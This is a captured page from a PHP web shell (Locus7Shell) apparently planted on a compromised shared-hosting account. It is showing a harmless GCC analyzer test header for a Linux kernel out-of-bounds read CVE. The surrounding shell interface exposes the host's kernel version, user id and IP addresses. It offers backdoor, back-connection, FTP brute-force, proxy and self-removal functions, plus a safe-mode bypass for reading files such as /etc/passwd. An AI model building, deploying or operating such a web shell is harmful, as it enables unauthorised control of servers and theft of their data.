Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/analyzer/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     taint-CVE-2020-13143.h (2.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Shared header for the various taint-CVE-2020-13143.h tests.
   
   "gadget_dev_desc_UDC_store in drivers/usb/gadget/configfs.c in the
   Linux kernel 3.16 through 5.6.13 relies on kstrdup without considering
   the possibility of an internal '\0' value, which allows attackers to
   trigger an out-of-bounds read, aka CID-15753588bcd4."

   Fixed by 15753588bcd4bbffae1cca33c8ced5722477fe1f on linux-5.7.y
   in linux-stable.  */

// TODO: remove need for this option
/* { dg-additional-options "-fanalyzer-checker=taint" } */

#include <stddef.h>

/* Adapted from include/uapi/asm-generic/posix_types.h  */

typedef unsigned int     __kernel_size_t;
typedef int              __kernel_ssize_t;

/* Adapted from include/linux/types.h  */

//typedef __kernel_size_t        size_t;
typedef __kernel_ssize_t    ssize_t;

/* Adapted from include/linux/kernel.h  */

#define container_of(ptr, type, member) ({                \
    void *__mptr = (void *)(ptr);                    \
    /* [...snip...] */                        \
    ((type *)(__mptr - offsetof(type, member))); })

/* Adapted from include/linux/configfs.h  */

struct config_item {
    /* [...snip...] */
};

struct config_group {
    struct config_item        cg_item;
    /* [...snip...] */
};

static inline struct config_group *to_config_group(struct config_item *item)
{
    return item ? container_of(item,struct config_group,cg_item) : NULL;
}

#define CONFIGFS_ATTR(_pfx, _name)                \
static struct configfs_attribute _pfx##attr_##_name = {    \
    /* [...snip...] */                \
    .store        = _pfx##_name##_store,        \
}

/* Adapted from include/linux/compiler.h  */

#define __force

/* Adapted from include/asm-generic/errno-base.h  */

#define    ENOMEM        12    /* Out of memory */

/* Adapted from include/linux/types.h  */

#define __bitwise__
typedef unsigned __bitwise__ gfp_t;

/* Adapted from include/linux/gfp.h  */

#define ___GFP_WAIT        0x10u
#define ___GFP_IO        0x40u
#define ___GFP_FS        0x80u
#define __GFP_WAIT    ((__force gfp_t)___GFP_WAIT)
#define __GFP_IO    ((__force gfp_t)___GFP_IO)
#define __GFP_FS    ((__force gfp_t)___GFP_FS)
#define GFP_KERNEL  (__GFP_WAIT | __GFP_IO | __GFP_FS)

/* Adapted from include/linux/compiler_attributes.h  */

#define __malloc                        __attribute__((__malloc__))

/* Adapted from include/linux/string.h  */

extern char *kstrdup(const char *s, gfp_t gfp) __malloc;

/* Adapted from drivers/usb/gadget/configfs.c  */

struct gadget_info {
    struct config_group group;
    /* [...snip...] */                \
};

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0062 ]--